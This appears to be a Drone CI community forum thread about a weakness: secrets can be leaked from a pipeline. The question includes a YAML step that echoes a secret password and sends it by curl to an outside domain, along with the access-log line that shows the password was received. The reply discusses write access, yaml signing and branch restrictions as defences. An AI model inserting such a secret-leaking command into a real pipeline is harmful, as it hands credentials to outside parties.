configuration is
- name: build-image
image: plugins/docker
volumes:
- name: tmp
path: /build
settings:
repo: citest
auto_tag: true
dry_run: true
password:
from_secret: passwd
commands:
- echo "$PLUGIN_REPO"
- echo "$PLUGIN_AUTO_TAG"
- echo "$PLUGIN_PASSWORD"
- apk add --no-cache curl
- curl -s "http://domain.com/testci/$PLUGIN_PASSWORD" -v
PLUGIN_PASSWORD will expose in access.log of domain.com
172.26.0.2 - - [25/Jun/2019:17:15:49 +0800] "GET /testci/mypassword HTTP/1.1" 404 169 "-" "curl/7.64.0" "-"
So, is there any way to avoid this? can plugin ignore commands?
First, it is important to note that anyone with write access to your repository can find a way to expose a secret. This is true of most CI systems including Drone, Travis, Circle and others because anyone with write access can modify a yaml to expose a secret.
You can sign a yaml file to prevent tampering and protect against certain vectors, especially if you make secrets available to pull requests (which is otherwise disabled by default). See https://docs.drone.io/user-guide/signature/. But please note that this does not prevent a user with write access from modifying your yaml file to expose a secret and then re-signing the yaml.
If you do not trust your collaborators you should only grant read access, and require everyone submit pull requests for patches. Limiting who has write access to your repository is the best way to prevent malicious tampering with your source code.
Update: GitHub also provides a new branch restriction feature which can prevent developers from pushing code directly. This enforces a fork and pull request workflow and can help mitigate this vector.
1 Like